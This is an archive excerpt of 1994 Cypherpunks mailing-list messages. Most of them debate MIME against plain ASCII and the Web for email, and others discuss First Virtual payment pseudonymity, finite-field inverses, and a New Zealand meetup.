graphics, images, etc. This will be the next main > stable attractor, deployed on many platforms. (I'm assuming the debate > here about Netscape standards does not imply much of a fragmentation, > that Mosaic, Netscape, MacWeb, etc., will all basically be able to > display Web pages in much the same way.) And of course there are no MIME standards; its physically impossible to deploy MIME on two different platforms identically. Why, the specifications are all written in english, and we know no engineers can read! I can see why you would reject MIME so vehemently. > The issue is not unwillingness to use new technology, it is, rather, > the issue of "stable attractors." I see. > I don't think the minor extensions to e-mail (loosely called "MIME," > though MIME serves other functions besides attaching graphics) are > worth the effort, frankly. Most of the MIME messages (the ones that > tell me about "ISO 558972 fonts" and "Press any key to return") don't > seem to warrant the effort.... Lets get down to serious issues for a moment. Because you've got a shitty MIME reader, you've concluded that the technology is bad. Thats all it comes down to. MIME allows fully multimedia in the style of the Web, you know. You can't say that the Web is good and consistantly call MIME bad. If you want to see what a difference implementation makes, try using a text-based Web browser for a few hours and then compare it to Netscape. If you'd ever used NeXTMail, you'd understand why MIME is a good thing. Just because you are using a kludgy reader doesn't mean MIME is kludgy. Perry From jalicqui at prairienet.org Thu Dec 15 13:13:57 1994 From: jalicqui at prairienet.org (Jeff Licquia) Date: Thu, 15 Dec 94 13:13:57 PST Subject: McCoy is Right! New Mail Format to Start Now. Message-ID: <9412152113.AA00540@firefly.prairienet.org> -----BEGIN PGP SIGNED MESSAGE----- Don't freak with the address... I'm moving. Check the sig if you're paranoid. Tim's wise words were: >The issue is not unwillingness to use new technology, it is, rather, >the issue of "stable attractors." That is, what can I/we reasonably >expect others to also have. Clearly if I issued my paper to the list >in FrameMaker format, or Acrobat format, or even TeX format, only a >few people would be able to read it. Fewer still would actually take >the steps needed to actually display the paper. > >Standards, standards, standards! > >I don't think the minor extensions to e-mail (loosely called "MIME," >though MIME serves other functions besides attaching graphics) are >worth the effort, frankly. Most of the MIME messages (the ones that >tell me about "ISO 558972 fonts" and "Press any key to return") don't >seem to warrant the effort....I think in 90%+ of the cases people >simply send messages as MIME by default, not becuase non-ASCII stuff >is included. Well, ignoring the fact that MIME appears to be infiltrating the Web as well... I would differ with your analysis of MIME's lack of usefulness. It does provide a possible way to integrate PGP into the mail/Web landscape (from a crypto standpoint). Multimedia I'm not so sure about; I think the big draw to MIME will come when Person A drags and drops a spreadsheet into a MIME mailer and sends the message to Person B, who then clicks on an icon to pull up the spreadsheet. But I digress... I'd say, however, that MIME isn't a done deal yet, though it's getting there. Until it's there, it's probably a bad idea. It's been my experience that many mailers are just MIME-compliant enough to cause their users lots of headaches. (As I write this, I notice I'm using Eudora, which MIMEs all its stuff. Oh, well; I hope this message isn't too much trouble for y'all...) >If we make the leap, I say make the leap to the Web: > >cave drawings --> text --> e-mail --> Web > >(By Web I of course mean the whole ball of wax involving HTML/HTTP/etc.) > >This is not a rejection of new technology, just a wise selection of >which technology to bet on. I vote for MIME-encoded cave drawings. :-) -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLvCxGjER5KvPRd0NAQH+bgP8C5oOpT0Cgzh0m3yXYZmsvpaZqB5FuZUt ZFQAHkKrIhaJ39IBhcJXv9Xmda/Jhp2wluvMDKlyzDxG/lvHJnr+h4cTJEUq6H57 bWPuQO2MBuBViOE77GFKreFzyLeamidlIlva3cIm/m/eYQXcF8l5qsNRB6O5kGe0 wq97dXfrVQ8= =OyM1 -----END PGP SIGNATURE----- From eric at remailer.net Thu Dec 15 13:16:08 1994 From: eric at remailer.net (Eric Hughes) Date: Thu, 15 Dec 94 13:16:08 PST Subject: Algebra In-Reply-To: <2B20CAE5> Message-ID: <199412152213.OAA07233@largo.remailer.net> So, how is division defined in Fp? There's a wonderful little theorem of broad technical use which says (a, b, m, n are all integers, or more generally, elements of a Euclidean domain) \forall a, b \in Z \exists m, n \in Z : a m + b n = gcd( a, b ) What this says is the greatest common divisor of 'a' and 'b' is a linear combination of them. The algorithm to find the gcd is the Euclidean algorithm; the algorithm to find the constants 'm' and 'n' is the extended Euclidean algorithm. To define multiplicative inverses in F_p, substitute 'p' for 'b' in the above equation. The gcd of 'p' and any non-zero element of F_p is 1. (And we already knew you can't divide by zero.) Now, reduce the equation modulo p; this turns elements of Z into elements of F_p and the second term of the addition goes to zero. What you get is \forall a \in F_p \exists m \in F_p : a m = 1 (mod p) That's the existence of multiplicative inverses in F_p. Use the extended Euclidean algorithm to calculate them. Eric From tcmay at netcom.com Thu Dec 15 13:20:52 1994 From: tcmay at netcom.com (Timothy C. May) Date: Thu, 15 Dec 94 13:20:52 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: Message-ID: <199412152119.NAA07643@netcom2.netcom.com> Jonathan Rochkind wrote: > >(By Web I of course mean the whole ball of wax involving HTML/HTTP/etc.) > > > >This is not a rejection of new technology, just a wise selection of > >which technology to bet on. > > HTTP and email, serve different transport purposes. I don't think I really > need to explain in what ways they are different, because we all know. > Suffice it to say that mailing lists work better as a mailing list then it > ever could as a web page, even with forms and all that stuff. A mailing > list is a different transport-method choice then HTTP is. Agreed, and I think my follow-up clarified my claim that the Web is the likely successor to standard e-mail. I think a generation exposed to Mosaic and similar browsers will want to find ways to use these windows into the Net for _nearly everything_. They will not want to buy or learn separate mail programs, negotiate separate accounts, or deal with MIME sorts of issues. They will ask for, and get, "gateways" between mail and the Web. (Gateways may not be the right word.) (We see this already, on the CP list, with Web pages containing the Cypherpunks list, with Web versions of my FAQ, etc. In the next few months, let alone the next few years, I expect to see more and more people reading the list via someone's Web pages. Maybe their own, maybe someone else's, etc.) > I don't think we'll ever stop using email in favor of the web and HTTP, > because they serve different purposes. I don't think Tim really does > thinks we'll stop using email either, since I've heard him deprecate the > web several times. He is just trying to convince us not to use MIME (or > html for that matter) in email we send to the list, and thinks maybe this > argument will convince us and not result in us calling him a technophobe. > :) I'm not sure what "deprecate the web" means here. I use "lynx" fairly regularly to retrieve stuff, and think it's pretty useful. I'm also a prime candidate for getting Netscape, when a few things stabilize (I won't say what, as that will then trigger the "Why don't you use X?" sorts of comments I get). My main point is that the most compelling strategy seems to be to stick with ASCII for a while, avoid minor-but-painful gains with Postscript, Acrobat, Replica, TeX, FrameViewer, etc., and then jump to the Web/html/http/blah blah when the time is right. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From mccoy at io.com Thu Dec 15 13:26:48 1994 From: mccoy at io.com (Jim McCoy) Date: Thu, 15 Dec 94 13:26:48 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: <199412152012.MAA28503@netcom2.netcom.com> Message-ID: <199412152125.PAA24115@pentagon.io.com> tcmay at netcom.com (Timothy C. May) wrote: [...] > I see two "stable attractors" for text/graphics/multimedia/etc. sent > over the Net: [1. ASCII text, proving once and for all that Tim has never had to do any significant work with cross-OS networking or managing a heterogeneous LAN...] > > 2. The Web, for graphics, images, etc. [...] Hmmm... and what kind of protocol does HTTP use for structuring the messages it passes from the server to the client.... RTFM Tim. > I don't think the minor extensions to e-mail (loosely called "MIME," > though MIME serves other functions besides attaching graphics) are > worth the effort, frankly. Most of the MIME messages (the ones that > tell me about "ISO 558972 fonts" and "Press any key to return") don't > seem to warrant the effort....I think in 90%+ of the cases people > simply send messages as MIME by default, not becuase non-ASCII stuff > is included. You should try spending some time working with mail crossing multiple gateways running different OSs and even different character sets [an EBCDIC<->ASCII cross is particularly fun...] The fact is that there are a variety of different commercial systems out there and they all seem to want to speak thier own language. MIME provides a means of seperating the message itself from the method and systems used to transport that message. A mail message is the most basic form of communication structure that is commonly used on the net. News is just an extension of the mail message, MIME is another extension of the message, but in a different direction. It seperates the message from the program that created it. ObCrypto: Without MIME crypto will never have the unification we seek. With the MIME message format it is possible to put together a mail message that will not be mangled by passing through several different gateways or other network boundary objects, and it allows the message to bundle itself up into functional parts. It allows one to seperate the signature from the message if you want, or create an encrypted message that can pass from a PC running on a Microsoft Mail system across the net to a Amiga that downloads it off a Fido BBS without the end-users needing to worry about what path it took and what kind of changes may have been made upon the message during transport. On this particular subject you just haven't got a fucking clue what you are talking about Tim. jim From nsb at nsb.fv.com Thu Dec 15 13:31:36 1994 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Thu, 15 Dec 94 13:31:36 PST Subject: FV & PGP (was Re: First Virtual email security) In-Reply-To: <29936.787515091.1@nsb.fv.com> Message-ID: Excerpts from fv: 15-Dec-94 Re: FV & PGP (was Re: First.. Ben at CS.YALE.EDU (1253*) > If you have to call, what would be the difference between this and normal > mail order save tha the catalog is digital? That's not a significant > enough of a change to have it considered a new form of commerce. The difference is that you only have to call ONCE, ever, and then you can order from any seller on that net accepts First Virtual accounts, with no encryption required. It's really silly for people to try to discuss FV's security without even understanding how it works. Please send mail to info at fv.com or spider over to http://www.fv.com. -- Nathaniel From tcmay at netcom.com Thu Dec 15 13:32:50 1994 From: tcmay at netcom.com (Timothy C. May) Date: Thu, 15 Dec 94 13:32:50 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: <9412152110.AA01391@snark.imsi.com> Message-ID: <199412152130.NAA09434@netcom2.netcom.com> Perry E. Metzger wrote: > Timothy C. May says: > > I see two "stable attractors" for text/graphics/multimedia/etc. sent > > over the Net: > > > > 1. Straight text, ASCII, 80 column format. All systems can handle > > this, all mailers and newsreaders can handle it, it's what the Usenet > > is essentially based upon, and it gets the job done. > > Sorry, Tim, but this isn't true. I know people who still own VIC-20s > that can't handle 80 columns. Also, users of ASR-33 teletypes might be > left out by the requirement to handle full ASCII. I was using an > ASR-33 full time only 15 years ago. But this isn't 15 years ago, and I daresay there isn't a _single_ subscriber to the Cypherpunks list using a VIC-20 or anything remotely similar. Of the 600 or so subscribers, and certainly of the 100-200 involved posters, I would bet that essentially all of them can display ASCII text on an 80-column screen. (I won't get into a Scholastic argument about what "all" means, as in "all systems can handle this," especially as in my message I later said "95%," but clearly 80-column ASCII is nearly universal these days. Not 15 years ago, perhaps, but this is now.) > Now, I know that all usenet postings in Japan these days use ISO-2022 > encoded characters, and MIME and all that, and that people in Russia > use similar methods to carry their stuff, but they are just > bounders. I say its back to 38 columns and upper-case only Baudot in > order to meet the lowest common denominator. You are once again misrepresenting my points. I said no such thing. > And of course there are no MIME standards; its physically impossible > to deploy MIME on two different platforms identically. Why, the > specifications are all written in english, and we know no engineers > can read! I can see why you would reject MIME so vehemently. I said no such thing, so your sarcasm is wasted. > > The issue is not unwillingness to use new technology, it is, rather, > > the issue of "stable attractors." > > I see. Do you? You seemed to have read into my message what you wished to, that I was making some argument for going backward, as this has been the thrust of your sarcasm. I made no such point. There's no point in arguing this any further. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From tcmay at netcom.com Thu Dec 15 13:35:08 1994 From: tcmay at netcom.com (Timothy C. May) Date: Thu, 15 Dec 94 13:35:08 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: <199412152125.PAA24115@pentagon.io.com> Message-ID: <199412152133.NAA09727@netcom2.netcom.com> Jim McCoy wrote: > On this particular subject you just haven't got a fucking clue what you are > talking about Tim. So polite, so succinct. I'll remember this. --Tim -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From eric at remailer.net Thu Dec 15 13:37:12 1994 From: eric at remailer.net (Eric Hughes) Date: Thu, 15 Dec 94 13:37:12 PST Subject: properties of FV In-Reply-To: Message-ID: <199412152234.OAA07282@largo.remailer.net> [re: making a receivables system for small value] Assuming that thing that you're "cobbling together" is based on a reasonably robust database engine, it should scale a long, long way. It's not the technology but the number of different kinds of exceptions to track that cause it not to scale. You don't need to solve those problems right away, though. > Partial security is better than no security. That's a *very* interesting statement. I'm not at all sure what it means, so I'm not sure if I believe it or not. Sometimes partial security is worse than no security because it gives people a false *sense* of security. It's like this. If there are two ways to break into my house, bashing in the front door and climbing through second story windows, it's better to have a strong front door and no bars on the upper windows than to have no strength in the front door and still no bars. Regardless of the security, users need to understand what it gives them. This is orthogonal to the choice of security, as well as to the persistence of thick-headedness in society. > In particular, if a digital signature does not, by agreement, carry an > implied warrantee of identity, then there's no problem at all. I sense that I this wording was less than fully explanatory. What this means using FV as an example, say, is that FV will not claim that a signed message actually originated from someone. A signature would be _advisory only_, and carry no legal weight as a signature or a proof of identity. You can still require signatures, because this does improve security. Suppose that a customer disavows a signed transaction, saying "Someone must have hacked my account". What you could _not_ do in this example is then to claim that "Well, it must be your account; it has your signature on it", because _by agreement_ the customer is not making any implicit claims about who actually holds the private key. In fact, the disclaimer of a warrantee of identity makes _explicit_ the fact that the private key is not relied upon to be held secretly. This is partial security. It is not all that can be accomplished with crypto; it is only a part. The partial security, however, still has value. > Use > the crypto entirely for transit security. If someone hacks your > machine and grabs your passphrase and forges a transaction, at least > the intruder has to grab your passphrase. This is exactly the way we would expect to use crypto layered on top of First Virtual's protocols, if and when such cryptographic protocols are deployed widely enough to have penetrated af meaningful portion of our market. "If and When" is Yes and Today. Anybody who can autosign their outgoing mail can participate in this kind of transaction already. Assuming the above agreement is made with respect to private keys, there is _no_ risk to the customer about loss of secret keys, and no greater risk to the merchant than what currently obtains. The dreams of utopia in cryptography are beginning to hold back deployment as much as architectural problems. Eric From perry at imsi.com Thu Dec 15 13:37:52 1994 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 15 Dec 94 13:37:52 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: <199412152130.NAA09434@netcom2.netcom.com> Message-ID: <9412152136.AA01440@snark.imsi.com> The point, Tim, is that you keep conflating a bad MIME read that you happen to use with the notion that MIME is bad. MIME doesn't force its users to understand anything about formats, character sets or anything else. Your mail reader is whats doing that. If you were, say, using the Andrew Messaging System which now understands MIME, you could remain blissfully ignorant the whole time of how the underpinnings work. .pm From mccoy at io.com Thu Dec 15 13:39:44 1994 From: mccoy at io.com (Jim McCoy) Date: Thu, 15 Dec 94 13:39:44 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: <199412152133.NAA09727@netcom2.netcom.com> Message-ID: <199412152139.PAA25566@pentagon.io.com> Tim wrote: > Jim McCoy wrote: > > On this particular subject you just haven't got a fucking clue what you are > > talking about Tim. > > So polite, so succinct. > > I'll remember this. Please do. There are a great many issues which your input and opinions are a valuable contribution to the content of this list. There are others where you seem to make guesses as to where things are going without having much of a leg to stand on. Your MIME position hurts the widespread use of cryptography because the advantages MIME gives to crypto far outweigh the short-term costs associated with a systemic upgrade to a better method for message transport and encapsulation. jim From bshantz at spry.com Thu Dec 15 13:52:19 1994 From: bshantz at spry.com (bshantz at spry.com) Date: Thu, 15 Dec 94 13:52:19 PST Subject: McCoy is Right! New Mail Format to Start Now. Message-ID: <9412152147.AA23272@homer.spry.com> Perry Metzger writes: >Sorry, Tim, but this isn't true. I know people who still own VIC-20s >that can't handle 80 columns. Also, users of ASR-33 teletypes might be >left out by the requirement to handle full ASCII. I was using an >ASR-33 full time only 15 years ago. 15 years ago, I was a 9 year old in the fifth grade who called the teacher a "nasty" name and was told to write 500 sentences as a reprimand. I asked if they could be typed, she said yes. So, I prompt;y went up to the 40 column display on the Apple IIe and wrote a four line, Apple Basic program that would repeatedly print 500 sentences saying, "It is not right to call the teacher names." When I handed it to her, she new she'd been set up. That didn't go over well as I remember. Anyway, that's not really what I wanted to say. I wanted to say that as a company that writes a Mail package. One of the biggest complaints of our customers has been lack of MIME support. Also, we have been severely "wrist slapped" for not formatting our mail messages to 80 characters so "normal people" could read it on their mail readers. So, my point, the market right now is for MIME support and user setting message widths. You can't please everyone all the time. >Now, I know that all usenet postings in Japan these days use ISO-2022 >encoded characters, and MIME and all that, and that people in Russia >use similar methods to carry their stuff, but they are just >bounders. Japanese characters are considerably different. I've been on some Japanese news servers that you just can't read with a normal news reader just because they require graphical Japanese characters. (Kanji, Katakana, or Hiragana ... depends on the group.) By the way, I was testing a news reader, I can't read Kanji. -- Brad >>>>>>>>>>>>>>>>>>>>>INTERNETWORKING THE DESKTOP<<<<<<<<<<<<<<<<<<<<<<< Brad Shantz bshantz at spry.com Senior Software Engineer SPRY Inc. Direct #: (206)-442-8251 316 Occidental Ave. S. Main #: (206)-447-0300 Suite 316 Fax #: (206)-447-9008 Seattle, WA 98104 WWW URL: http://WWW.SPRY.COM ---------------------------------------------------------------------- PGP Public Key at: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or email: pgp-public-keys at pgp.ai.mit.edu Subj: GET bshantz >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< From jamesd at netcom.com Thu Dec 15 14:10:15 1994 From: jamesd at netcom.com (James A. Donald) Date: Thu, 15 Dec 94 14:10:15 PST Subject: properties of FV In-Reply-To: <199412152234.OAA07282@largo.remailer.net> Message-ID: <199412152207.OAA18565@netcom10.netcom.com> Eric Hughes writes > The dreams of utopia in cryptography are beginning to hold back > deployment as much as architectural problems. Very true. Now could everyone keep that in mind before flaming Netscape. -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From jamesd at netcom.com Thu Dec 15 14:16:54 1994 From: jamesd at netcom.com (James A. Donald) Date: Thu, 15 Dec 94 14:16:54 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: <9412152136.AA01440@snark.imsi.com> Message-ID: <199412152216.OAA19537@netcom10.netcom.com> Perry E. Metzger writes > The point, Tim, is that you keep conflating a bad MIME read that you > happen to use with the notion that MIME is bad. No two mimes seem to entirely agree what mime format is. I use Sun's stuff. It is a pile of stinking shit. This a new spark station 20, state of the art and all that. Sure, mime would be great if everyone had a great Mime and every diverse system with every diverse mime interpreter all worked and they all worked in the same way. This is not the case. -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From andrew_loewenstern at il.us.swissbank.com Thu Dec 15 14:17:11 1994 From: andrew_loewenstern at il.us.swissbank.com (Andrew Lowenstern) Date: Thu, 15 Dec 94 14:17:11 PST Subject: properties of FV Message-ID: <9412152217.AA03954@ch1d157nwk> > This goes back to the two kinds of anonymity that you so usefully > defined in your earlier message. These small transactions would > have counterparty anonymity -- all that the seller knows is your > first virtual id, which is essentially a user-chosen pseudonym -- > but not issuer anonymity. That would make this counterparty pseudonymity, not anonymity. The merchant, while not knowing the true identity of his clients, is still able to correlate the transactions of individual accounts (and must be able to under FV's policies). A malicious merchant, for instance, could recognize that a particular account is more interested in certain types of information and charge accordingly. andrew From nsb at nsb.fv.com Thu Dec 15 14:20:48 1994 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Thu, 15 Dec 94 14:20:48 PST Subject: properties of FV In-Reply-To: <16267.787529765.1@nsb.fv.com> Message-ID: Excerpts from fv: 15-Dec-94 Re: properties of FV Andrew Lowenstern at il.us. (718*) > > This goes back to the two kinds of anonymity that you so usefully > > defined in your earlier message. These small transactions would > > have counterparty anonymity -- all that the seller knows is your > > first virtual id, which is essentially a user-chosen pseudonym -- > > but not issuer anonymity. > That would make this counterparty pseudonymity, not anonymity. The merchant, > while not knowing the true identity of his clients, is still able to > correlate the transactions of individual accounts (and must be able to under > FV's policies). A malicious merchant, for instance, could recognize that a > particular account is more interested in certain types of information and > charge accordingly. Good point. I stand corrected, at least as far as the terminology is concerned. However, as far as the particular malicious-merchant scenario is concerned, I must say I'd be skeptical about any merchant who didn't tell me the price up front, *before* he asked me for my account-id... -- Nathaniel From ianf at sydney.sgi.com Thu Dec 15 14:26:35 1994 From: ianf at sydney.sgi.com (Ian Farquhar) Date: Thu, 15 Dec 94 14:26:35 PST Subject: Zimmermann Defense Fund Appeal In-Reply-To: <199412151526.HAA05726@sleepy.retix.com> Message-ID: <9412160924.ZM13302@wiley.sydney.sgi.com> On Dec 15, 7:26am, joshua geller wrote: > this has always been the state of the american, and as far as I know > of all legal systems. Very true. Try as I might, I cannot think of any legal system in the world where a large amount of money cannot buy justice... or injustice. Ian. From perry at imsi.com Thu Dec 15 14:26:43 1994 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 15 Dec 94 14:26:43 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: <199412152216.OAA19537@netcom10.netcom.com> Message-ID: <9412152226.AA01486@snark.imsi.com> James A. Donald says: > Perry E. Metzger writes > > The point, Tim, is that you keep conflating a bad MIME reader that you > > happen to use with the notion that MIME is bad. > > No two mimes seem to entirely agree what mime format is. Well, the specification is pretty clear. Its pretty simple stuff, actually, and remarkably well designed. > I use Sun's stuff. It is a pile of stinking shit. When last I checked, Sun's "Mailtool" did not support MIME, but supported a proprietary enclosure format. (This may have changed in the Openwindows supplied with 2.4, but to my knowledge 2.4 only came out weeks ago and it is unlikely that you are using it.) Perry From tcmay at netcom.com Thu Dec 15 14:28:22 1994 From: tcmay at netcom.com (Timothy C. May) Date: Thu, 15 Dec 94 14:28:22 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: <9412152136.AA01440@snark.imsi.com> Message-ID: <199412152227.OAA05100@netcom12.netcom.com> As Perry is actually making some points without sarcasm (*) and without demonizing me as some Neanderthal bent on converting the list to a 20-column, all caps past, I'll respond: Perry E. Metzger wrote: > The point, Tim, is that you keep conflating a bad MIME read that you > happen to use with the notion that MIME is bad. MIME doesn't force its > users to understand anything about formats, character sets or anything > else. Your mail reader is whats doing that. If you were, say, using > the Andrew Messaging System which now understands MIME, you could > remain blissfully ignorant the whole time of how the underpinnings > work. Perhaps, but I don't have the Andrew Messaging System, nor do I expect most of the subscribers here. I see lots of AOL, Compuserve, Portal, Netcom, etc., accounts, and the range of mailers available to (most) of them does not include the AMS or similar things. I deeply resent--but will try not to take it personally, so no animosity to Perry or Jim or others is intended--the insinuation through sarcasm or through direct statements that I am hopelessly wedded to a past of ASR-33 terminals and good old-fashioned typewriters. Like a lot of folks here, I use stuff that's far beyond simple ASCII. I think I've adequately covered this point. Eric Hughes wrote a nice piece several weeks back about adoption of new technology, new tools all being a matter of _return on investment_. For example, I could spend some number of hours switching from my current mail progam (elm) to some other editor which perhaps better-supported the MIME messages seen here. But if all I got for several hours of using, learning, and becoming comfortable with, say, "pine," was the ability to see an _italicized_ word, or a word in Cyrillic, then I would consider this a poor ROI. And nobody has yet said there's anything worth doing this for in any of the MIME messages I've yet seen. Sure, Amanda W. exercised the process by including a GIF....a process which several people saw errors with, and no doubt many others skipped completely. Does this make me backward? No. It's all ROI. Like it or not, we are now in a mostly-ASCII Net environment. This shows up when people fail to convert special characters (apostrophes, left and right quotes, em dashes, bullets, etc.) into the "straight ASCII" characters (such as ', ", --, *) that most of the rest of us can display easily. People right complain about posts and messages filled with "^H" and other oddball symbols. (And it certainly doesn't mean that people like me don't have the capability of displaying extended character sets....I clearly can, given the right tools, effort, etc. Many can't, and many won't. The "Display Postscript" standard was an attempt to bootstrap the world to a new standard for document display, and it failed. Maybe the "Andrew Message System" is another such fix. Maybe it's even better designed. All well and good. But it ain't available to most of us. Nor would I even install it if all I got was em dashes and the like displayed correctly. ROI, again.) Please don't characterize my views as Luddite wishes for a simpler world. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From CCGARY at MIZZOU1.missouri.edu Thu Dec 15 14:28:25 1994 From: CCGARY at MIZZOU1.missouri.edu (Gary Jeffers) Date: Thu, 15 Dec 94 14:28:25 PST Subject: rng & program docs. programs Message-ID: <9412152228.AA22773@toad.com> -----BEGIN PGP SIGNED MESSAGE----- Dear Cypherpunks, 1. I need a good DOS software random number generator for a crypto project of mine. Can anyone give me the ftp site & other d/l info. of something good? 2. Also needed, is some software documentation tools. - shareware or free. Here's the problem: I program in PC Assembler & C & although I program structured & use modules, I find that when I have a lot of subs that if I pick out anyone of them, that I have a hard time relating it to the rest of the code. That is to say: if I start out with say 3 major modules & have them call subs that call subs that call subs, then when I examine anyone sub, it is hard to understand its relation to the rest of the code. Anyone recommend a program with an ftp site or have any helpful info on this? Yours Truly, Gary Jeffers Following is my military grade public key armored. - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAy7wt2IAAAEEALQ+0QCeQIMNCBGQtZxPtLE1z9ltqDVCy5h6tpic6RsmgcFS kp92CV3Vptmr7/jqb+SMJ8HUYV7XAz1I1sDEjYrJ3vP9UZh0gTlUDW/lEosZ8mjH ott/uurW9hw8/nPnQNRzcJIHpdkcHtjJwvTB4v5BBr94oKy7JthOFCSMI5OVAAUR tC5HYXJ5IExlZSBKZWZmZXJzIDxjY2dhcnlAbWl6em91MS5taXNzb3VyaS5lZHU+ =+0yw - -----END PGP PUBLIC KEY BLOCK----- -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLvC599hOFCSMI5OVAQF+wwP+IIIuNJD9grm+YhhhkcOeKEi0+aFI253a rW1JaBblgCOEHBuQmyfbeRqRIPHz5PUZat2u0WcSmzgX6CH4B2rEggUTZ/vBss7e o7fCNKGLebFQ690iV+B70WG/7+cp9jqYAwbfJSLuDubD8oLFvOr9/4EPTo/oEFLz FwM40K8w3M4= =nkPn -----END PGP SIGNATURE----- From Tony.Gurnick at nzdairy.co.nz Thu Dec 15 14:45:11 1994 From: Tony.Gurnick at nzdairy.co.nz (DNA) Date: Thu, 15 Dec 94 14:45:11 PST Subject: Kiwi Cypherpunks! Message-ID: <94121519471967@nzdairy.co.nz> >From: SMTP%"phillip at mserve.kiwi.gen.nz" >To: Bryce Boland >CC: >Subj: Re: New zealand meetings? > >On Wed, 14 Dec 1994, Bryce Boland wrote: > >> Yeah, lets do it then. It might be kind of difficult to hook up a >> workstation at GP's, but we can arrange something. Then we might be able to >> arrange a more permanent/suitable venue. >> > >Sounds good to me also ;-) > >CC: DNA , cwedgwood at cybernet.co.nz, > pgut1 at cs.auckland.ac.nz Well thats 2 replys, Man it`s going to be packed! :) When a meeting happens what do we discuss?/do? - an obvious one would be NZ crypto! - New crypto ideas? - NZ Anon remailers & Repositorys - Patents??? (maybe not) - Cryptanalasis (Hopefully, oh please-oh please) Um, what else T PS: Why do we need a workstation? (probably a dumb question) From andrew_loewenstern at il.us.swissbank.com Thu Dec 15 14:45:31 1994 From: andrew_loewenstern at il.us.swissbank.com (Andrew Lowenstern) Date: Thu, 15 Dec 94 14:45:31 PST Subject: properties of FV Message-ID: <9412152245.AA04184@ch1d157nwk> > > That would make this counterparty pseudonymity, not anonymity. > > The merchant, while not knowing the true identity of his clients, > > is still able to correlate the transactions of individual accounts > > (and must be able to under FV's policies). A malicious merchant, > > for instance, could recognize that a particular account is more > > interested in certain types of information and charge accordingly. > > Good point. I stand corrected, at least as far as the terminology > is concerned. However, as far as the particular malicious-merchant > scenario is concerned, I must say I'd be skeptical about any merchant > who didn't tell me the price up front, *before* he asked me for my > account-id... -- Nathaniel Of course, but what if you bought something from a Web server, revealing your account-id to the server. A smart server could adjust the prices on pages that haven't been retrieved yet. I don't know if this is necessarily possible with hhtp (i.e. does your client always use the same return port number for requests during a given instance of the client? ), but you get the idea. Worse, linkability of transactions also allows the merchant to do 'payment traffic analysis' in an attempt to determine the real identities of it's clients. Many merchants can get together and compare transaction logs as well... These 'attacks' are a feature of any payment system that has only counter party pseudonymity (as opposed to anonymity), not just First Virtual... andrew From perry at imsi.com Thu Dec 15 14:46:55 1994 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 15 Dec 94 14:46:55 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: <199412152227.OAA05100@netcom12.netcom.com> Message-ID: <9412152246.AA01511@snark.imsi.com> Timothy C. May says: > For example, I could spend some number of hours switching from my > current mail progam (elm) to some other editor which perhaps > better-supported the MIME messages seen here. But if all I got for > several hours of using, learning, and becoming comfortable with, say, > "pine," was the ability to see an _italicized_ word, or a word in > Cyrillic, then I would consider this a poor ROI. You misunderstand the purpose of MIME. It is a way of standardizing the encapsulation of non-ascii information and references inside of an RFC-822 mail message. It allows you to do things like get cyrillic or what have you, but more importantly, it allows things like recursive encapsulation of your messages inside encrypting transformations, the transmission of attachments allong with documents, mailing HTML, embedding external references in mail (i.e. "Click here to get a copy of my latest program) and dozens of other significant things. MIME and HTML are complementary to each other -- HTTP is one way of transporting HTML, but with MIME you can see a Web page, cut it out, paste it into your MIME aware gee-whiz mailer, and send it to someone who could then treat it just like he was looking at the Web, provided he, too, had a good enough MIME capable reader. You could send out your latest document, in 